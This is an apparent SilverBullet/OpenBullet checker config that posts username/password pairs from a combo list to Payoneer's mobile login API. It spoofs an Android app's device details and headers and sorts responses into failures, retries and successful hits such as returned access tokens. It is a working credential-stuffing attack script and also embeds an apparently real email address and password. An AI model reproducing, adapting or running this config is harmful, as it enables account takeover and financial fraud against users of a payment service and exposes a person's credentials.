[SETTINGS]
{
  "Name": "Payoneer",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-06-15T14:57:15.6206912+04:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.1 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Payoneer",
  "IconPath": "Icon\\svbfile.ico",
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#lngg FUNCTION Length "{\"Username\":\"Hessam123@gmail.com\",\"Password\":\"123qwe123\",\"DeviceId\":\"662b6ecdcbcc3975\",\"DeviceName\":\"SM-G977N\",\"DeviceInfo\":{\"DeviceType\":\"SM-G977N\",\"OSType\":1,\"OSVersion\":\"5.1.1\",\"DeviceLanguage\":\"en\",\"DeviceTime\":\"2021-06-14T21:27:41+04:30\",\"DeviceCategory\":2,\"AppVersion\":\"5.7.0\"}}" -> VAR "lngg" 

REQUEST POST "https://loginapi.payoneer.com/api/v1/mobile/login" 
  CONTENT "{\"Username\":\"<USER>\",\"Password\":\"<PASS>\",\"DeviceId\":\"662b6ecdcbcc3975\",\"DeviceName\":\"SM-G977N\",\"DeviceInfo\":{\"DeviceType\":\"SM-G977N\",\"OSType\":1,\"OSVersion\":\"5.1.1\",\"DeviceLanguage\":\"en\",\"DeviceTime\":\"2021-06-14T21:27:41+04:30\",\"DeviceCategory\":2,\"AppVersion\":\"5.7.0\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "accept: application/json" 
  HEADER "User-Agent: Payoneer/5.7.0 (SM-G977N; Android 5.1.1)" 
  HEADER "Content-Type: application/json" 
  HEADER "X-Payoneer-Culture: en" 
  HEADER "Accept-Charset: UTF-8" 
  HEADER "Host: loginapi.payoneer.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: <lngg>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "WrongDetails" 
    KEY "UserIsLocked" 
  KEYCHAIN Retry OR 
    KEY "WrongDetails1MoreTries" 
    KEY "WrongDetails2MoreTries" 
  KEYCHAIN Success OR 
    KEY "NeedToChangePassword" 
    KEY "RequireDOB" 
    KEY "AccessToken" 

